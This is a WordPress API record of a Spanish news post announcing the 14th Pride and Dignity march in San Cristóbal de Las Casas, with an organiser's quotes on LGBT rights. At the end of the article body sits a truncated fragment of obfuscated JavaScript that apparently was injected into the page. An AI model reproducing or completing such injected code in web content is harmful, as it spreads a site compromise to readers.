{"id":10473,"date":"2023-06-10T03:25:35","date_gmt":"2023-06-10T03:25:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10473"},"modified":"2023-06-10T03:25:36","modified_gmt":"2023-06-10T03:25:36","slug":"anuncian-la-14a-marcha-del-orgullo-y-dignidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10473","title":{"rendered":"Anuncian la 14\u00aa marcha del Orgullo y Dignidad"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"646\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-09-at-4.32.29-PM-1024x646.jpeg\" alt=\"\" class=\"wp-image-10474\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-09-at-4.32.29-PM-1024x646.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-09-at-4.32.29-PM-300x189.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-09-at-4.32.29-PM-768x485.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/06\/WhatsApp-Image-2023-06-09-at-4.32.29-PM.jpeg 1068w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>09 de Junio del 2023. San Crist\u00f3bal de Las Casas.- Nano Cort\u00e9s, integrante de a ruta positiva sexual y la red gay latina internacional, anunci\u00f3 que este domingo 11 de junio en San Crist\u00f3bal de Las Casas, realizar\u00e1n la 14\u00aa marcha el Orgullo y Dignidad con la finalidad que la ciudadan\u00eda y la poblaci\u00f3n respeten a estas personas,<\/p>\n\n\n\n<p>En conferencia de prensa, dijo que en el marco de la catorceava marcha del orgullo y dignidad LGTTTIAP+, varias ciudades del estado y de la Rep\u00fablica mexicana marchar\u00e1n para exigir los derechos a los que integran esta comunidad, y en esta ciudad vendr\u00e1n 7 organizaciones.<\/p>\n\n\n\n<p>Revel\u00f3 que ser\u00edan m\u00e1s de 200 personas las que se har\u00e1n presentes en la b\u00fasqueda de que sean respetados a cada uno de ellos y de ellas, partiendo de la explanada de la unidad administrativa al sur de San Crist\u00f3bal, concluyendo en la Plaza Catedral.<\/p>\n\n\n\n<p>&#8220;Nosotros somos lo que somos, por eso salimos a las calles a que la gente nos vea como una persona m\u00e1s, a que nos conozca y sobre todo que nos respeten, as\u00ed como nosotros respetamos a ellas y ellos tambi\u00e9n pedimos que nos respeten, por eso este domingo vamos a salir a las calles y vamos a concluir con un mitin en la plaza catedral&#8221;, indicaron.<\/p>\n\n\n\n<p>En esta marcha puntualiz\u00f3 que buscan que en las cuestiones laborales y educativas, sean respetados y respetadas como tal, sin que se les violenten este derecho, \u201ctodo el tiempo vivimos bajo una presi\u00f3n y ansiedad constante de ser agredidos f\u00edsica y verbalmente\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 09 de Junio del 2023. San Crist\u00f3bal de Las Casas.- Nano Cort\u00e9s, integrante de a ruta positiva sexual y la red gay latina internacional, anunci\u00f3 que este domingo 11 de junio en San Crist\u00f3bal de Las Casas, realizar\u00e1n la 14\u00aa marcha el Orgullo y Dignidad con la finalidad que la ciudadan\u00eda y la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10474,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-10473","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10473","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10473"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10473\/revisions"}],"predecessor-version":[{"id":10475,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10473\/revisions\/10475"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10474"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10473"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10473"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10473"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}